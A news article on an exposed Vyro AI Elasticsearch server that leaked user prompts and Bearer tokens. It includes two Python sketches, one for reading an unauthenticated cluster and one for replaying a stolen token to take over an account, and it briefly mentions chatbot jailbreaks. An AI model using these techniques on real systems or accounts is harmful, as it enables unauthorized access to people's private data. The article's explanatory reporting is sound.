Researchers at Cybernews have reported a serious data leak involving Vyro AI's popular generative applications for Android and iOS. An open Elasticsearch server belonging to the developer was publishing 116 GB of logs in real time, without any protection, collected from three of the company's services: ImagineArt, with more than 10 million installs on Google Play; Chatly, with hundreds of thousands of downloads; and the web service Chatbotx, visited by about 50 thousand users a month.
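To see why such a misconfiguration is so dangerous, consider a minimal Python sketch (the server address and index name below are hypothetical placeholders, not the real host): an Elasticsearch instance exposed without authentication answers ordinary HTTP requests from anyone who discovers it.

```python
# Hedged sketch: an unauthenticated Elasticsearch server is effectively public.
# Anyone who finds the address can list indices and read documents over plain
# HTTP with no credentials. Host and index names here are made up.
import requests

ES_HOST = "http://203.0.113.10:9200"  # placeholder address (TEST-NET range)

# List all indices on the cluster (equivalent to `GET /_cat/indices`).
indices = requests.get(f"{ES_HOST}/_cat/indices?format=json", timeout=10).json()
for idx in indices:
    print(idx["index"], idx["store.size"])

# Pull the ten most recent documents from a hypothetical log index.
query = {"size": 10, "sort": [{"@timestamp": {"order": "desc"}}]}
hits = requests.post(f"{ES_HOST}/app-logs/_search", json=query, timeout=10).json()
for hit in hits["hits"]["hits"]:
    print(hit["_source"])
```

No exploit is required: the cluster's own REST API serves the data to whoever asks, which is also how IoT search engines end up indexing such servers.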
Vyro AI is based in Pakistan and claims that its applications have been downloaded more than 150 million times in total, with about 3.5 million images generated every week. According to the researchers, the exposed server contained logs from both production and test environments, retaining data from the previous 2-7 days. The database was first indexed by IoT search engines in February, which could have given attackers access to the data for several months.
The logs included users' prompts to the AI, Bearer authentication tokens, and data about the devices and browsers used. Taken together, this information made it possible to monitor people's activity, hijack accounts, and extract personal information from chats. The situation is especially dangerous in the case of ImagineArt, which has more than 30 million active users. Stolen tokens would let an attacker take control of profiles, gain access to chat histories and generated images, and use paid features at the owners' expense.
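Why does a leaked token translate directly into account takeover? The sketch below illustrates the mechanism; the API endpoint, paths, and token value are hypothetical stand-ins, not Vyro AI's actual API. Bearer authentication simply accepts whoever presents the token.

```python
# Hedged sketch of Bearer-token replay: HTTP APIs that authenticate with
# `Authorization: Bearer <token>` treat anyone presenting the token as the
# account owner. Endpoint and token below are hypothetical examples.
import requests

leaked_token = "eyJhbGciOiJIUzI1NiJ9...."  # token scraped from exposed logs

session = requests.Session()
session.headers["Authorization"] = f"Bearer {leaked_token}"

# The server cannot distinguish these requests from ones sent by the real user.
profile = session.get("https://api.example.com/v1/me", timeout=10).json()
chats = session.get("https://api.example.com/v1/chats", timeout=10).json()
print(profile, len(chats))
```

Until the token expires or is revoked, every request made this way runs with the victim's privileges, including any paid features tied to the account.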
An additional risk comes from the disclosure of the user prompts themselves. Conversations with neural networks often contain private data that people would never publish openly. If such information falls into the wrong hands, the consequences can be serious, both reputational and financial.
Disclosure of the Vyro AI incident proceeded in stages: the problem was discovered on April 22, 2025, the company was notified on July 22, and the national CERT (Computer Emergency Response Team) was brought in on July 28. The market is growing rapidly, and developers sometimes neglect data protection. Meanwhile, users increasingly entrust generative AI systems with their ideas, documents, and even confidential information. Incidents like this only underline that security must become a mandatory priority.
Similar problems affect large players as well. In August, for example, users discovered that their conversations with ChatGPT and Grok were showing up in search engine results.
Cybernews researchers also recently showed that a chatbot could be made to generate instructions for building incendiary devices, which clearly demonstrates the risks of rushed releases. Even OpenAI's latest GPT-5 model could not avoid protection problems: research teams managed to bypass its restrictions just a day after launch.